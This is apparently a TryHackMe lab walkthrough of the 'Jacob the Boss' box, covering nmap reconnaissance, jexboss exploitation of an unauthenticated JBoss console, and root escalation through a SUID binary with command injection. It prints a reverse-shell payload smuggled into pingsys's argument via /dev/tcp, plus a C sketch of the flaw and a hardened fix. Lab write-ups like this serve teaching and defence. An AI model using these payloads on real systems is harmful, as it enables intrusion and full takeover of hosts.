TryHackMe Jacob the Box Walkthrough
Brief technical writeup explaining how we got full access to the Jacob the Boss machine from TryHackMe.
Target Information
Externally accessible:
- IP address: 10.10.7.212
- Domain names: jacobtheboss.thm, jacobtheboss.box
DISCOVERY & RECONNAISSANCE
As the first step of this engagement, I'll start with an nmap scan including default scripts and service version enumeration.
h4ck3r@local:~/jacobtheboss.thm$ nmap -v -sC -sV -oN nmap/nmap_tcp_simple 10.10.7.212
Nmap scan report for jacobtheboss.thm (10.10.173.140)
Host is up (0.096s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
|   256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_  256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp   open  http         Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp  open  rpcbind      2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp   rpcbind
|   100000  2,3,4      111/udp   rpcbind
|   100000  3,4        111/tcp6  rpcbind
|_  100000  3,4        111/udp6  rpcbind
1090/tcp open  java-rmi     Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open  java-rmi     Java RMI
1099/tcp open  java-object  Java Object Serialization
| fingerprint-strings:
|   NULL:
|     java.rmi.MarshalledObject
|
|     hash[
|     locBytest
|     objBytesq
|     http://jacobtheboss.box:8083/q
|     org.jnp.server.NamingServer_Stub
|     java.rmi.server.RemoteStub
|     java.rmi.server.RemoteObject
|     xpw;
|     UnicastRef2
|_    jacobtheboss.box
3306/tcp open  mysql        MariaDB (unauthorized)
4444/tcp open  java-rmi     Java RMI
4445/tcp open  java-object  Java Object Serialization
4446/tcp open  java-object  Java Object Serialization
8009/tcp open  ajp13        Apache Jserv (Protocol v1.3)
| ajp-methods:
|   Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|   Potentially risky methods: PUT DELETE TRACE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http         Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Unknown favicon MD5: 799F70B71314A7508326D1D2F68F7519
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss™
8083/tcp open  http         JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
A full scan of all TCP ports (-p-) is also a must.
h4ck3r@local:~/jacobtheboss.thm$ nmap -v -p- -T4 -oN nmap/nmap_tcp_full 10.10.7.212
Nmap scan report for jacobtheboss.thm (10.10.173.140)
Host is up (0.085s latency).
Not shown: 65515 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
1090/tcp  open  ff-fms
1098/tcp  open  rmiactivation
1099/tcp  open  rmiregistry
3306/tcp  open  mysql
3873/tcp  open  fagordnc
4444/tcp  open  krb524
4445/tcp  open  upnotifyp
4446/tcp  open  n1-fwp
4457/tcp  open  prRegister
4712/tcp  open  unknown
4713/tcp  open  pulseaudio
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
8083/tcp  open  us-srv
36369/tcp open  unknown
38395/tcp open  unknown
47073/tcp open  unknown
Without any further enumeration, the JBoss HTTP service deployed on port 8083 caught my attention.
Validation & Exploitation
Using the results of the reconnaissance as a starting point and walking through the JBoss environment, we discovered that the JMX Console is deployed with no credentials. Therefore, we can upload and deploy Web Application Archive (WAR) files remotely through this admin console and compromise the network.
We chose the jexboss tool to automate the exploitation part.
h4ck3r@local:~/jacobtheboss.thm$ python ~/Tools/web_pentesting/jexboss/jexboss.py -host http://jacobtheboss.box:8080/

 ** Checking Host: http://jacobtheboss.box:8080/ **

 [*] Checking admin-console:                  [ OK ]
 [*] Checking Struts2:                        [ OK ]
 [*] Checking Servlet Deserialization:        [ OK ]
 [*] Checking Application Deserialization:    [ OK ]
 [*] Checking Jenkins:                        [ OK ]
 [*] Checking web-console:                    [ VULNERABLE ]
 [*] Checking jmx-console:                    [ VULNERABLE ]
 [*] Checking JMXInvokerServlet:              [ VULNERABLE ]

 * Sending exploit code to http://jacobtheboss.box:8080/. Please wait...

 * Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.
   OBS: You can also use the --cmd "command" to send specific commands to run on the server.

   IP Address (RHOST): 10.9.123.226
   Port (RPORT): 9991
We successfully exploited the vulnerability in JBoss to get remote code execution and obtain a shell with the privileges of the user jacob.
[jacob@jacobtheboss tmp]$ id
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
Internal Enumeration
With interactive access to the underlying OS on our target network, we continued examining the system for ways to escalate privileges to root. We found a SUID binary:
[jacob@jacobtheboss /]$ find / -perm -4000 -user root 2>/dev/null
/usr/bin/pingsys   <<---
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chage
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
Transferring the binary locally for further analysis.
[jacob@jacobtheboss /]$ scp /usr/bin/pingsys h4ck3r@10.9.123.226:/home/h4ck3r/jacobtheboss.thm/files/pingsys
Reverse engineering the binary shows that it takes arguments from the user:
0x00400616      897ddc         mov dword [var_24h], edi    ; argc
0x00400619      488975d0       mov qword [var_30h], rsi    ; argv
sets the UID to 0 (root):
0x004006a5      bf00000000     mov edi, 0
0x004006aa      e861feffff     call sym.imp.setuid
and then passes those arguments to the system() function for execution:
0x004006c3      488b45e0       mov rax, qword [var_20h]
0x004006c7      4889c7         mov rdi, rax
0x004006ca      e8f1fdffff     call sym.imp.system         ; int system(const char *string)
We can conclude that the SUID binary is vulnerable to command injection: the user-controlled string reaches /bin/sh with root privileges and nothing filters shell metacharacters.
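As an added example, not the source of the box's pingsys (which is not on the page), here is the vulnerable shape the disassembly implies beside a hardened replacement. The command template "ping -c 4" is an assumption; the fix validates the argument as a plain IPv4 literal and execs ping directly, so no shell ever parses user input and privileges are never raised by the wrapper.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable shape recovered from the disassembly: setuid(0), then the untrusted
 * argument is spliced into a shell line, so a ';' in argv[1] runs as root. */
int pingsys_vulnerable(const char *arg)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "ping -c 4 %s", arg);   /* assumed template */
    (void)setuid(0);            /* root before any input validation */
    return system(cmd);         /* /bin/sh -c "ping -c 4 <arg>" */
}

/* Accept only a dotted-quad IPv4 literal (four decimal octets, 0-255, at most
 * three digits each). Anything else, including shell metacharacters, is rejected. */
int is_ipv4_literal(const char *s)
{
    for (int octet = 0; octet < 4; octet++) {
        if (*s < '0' || *s > '9') return 0;       /* octet must start with a digit */
        char *end;
        long v = strtol(s, &end, 10);
        if (v > 255 || end - s > 3) return 0;
        s = end;
        if (octet < 3) { if (*s != '.') return 0; s++; }
    }
    return *s == '\0';                             /* nothing may follow, e.g. ';' */
}

/* Hardened shape: validate, then exec ping with a fixed argv so no shell parses
 * the target, and never raise privileges. Returns ping's exit status or -1. */
int pingsys_hardened(const char *target)
{
    if (!is_ipv4_literal(target)) return -1;   /* refuse anything unexpected */
    pid_t pid = fork();
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "4", (char *)target, NULL };
        execv("/usr/bin/ping", argv);         /* absolute path, no PATH lookup */
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```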
ROOT — Privilege escalation
We can easily spawn a reverse shell by injecting our payload into the arguments.
[jacob@jacobtheboss /]$ /usr/bin/pingsys '127.0.0.1;/bin/bash -i > /dev/tcp/10.9.123.226/9991 0>&1 2>&1'
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.033 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.031 ms

--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.017/0.028/0.033/0.007 ms
We successfully gained an interactive root shell on the compromised host.
h4ck3r@local:~/jacobtheboss.thm$ nc -vnlp 9991
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9991
Ncat: Listening on 0.0.0.0:9991
Ncat: Connection from 10.10.9.96.
Ncat: Connection from 10.10.9.96:36850.
[root@jacobtheboss /]# id
uid=0(root) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0
[root@jacobtheboss /]# cat /root/root.txt
29a5641e************************